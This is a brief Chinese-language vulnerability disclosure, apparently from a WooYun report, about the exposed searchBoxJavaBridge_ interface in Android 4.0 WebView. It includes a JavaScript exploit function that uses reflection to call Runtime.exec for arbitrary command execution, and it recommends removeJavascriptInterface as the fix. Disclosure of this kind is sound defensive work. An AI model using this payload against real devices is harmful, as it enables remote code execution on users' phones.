导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在，4.2以上版本不存在

function execute(cmdArgs)

{

return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

}

测试页面:https://drops.wooyun.org/webview.html

参见: /Article/201309/241271.html
 

漏洞证明：

1.jpg

修复方案：

需要把这个接口删除，调用removeJavascriptInterface方法
/Article/201404/296370.html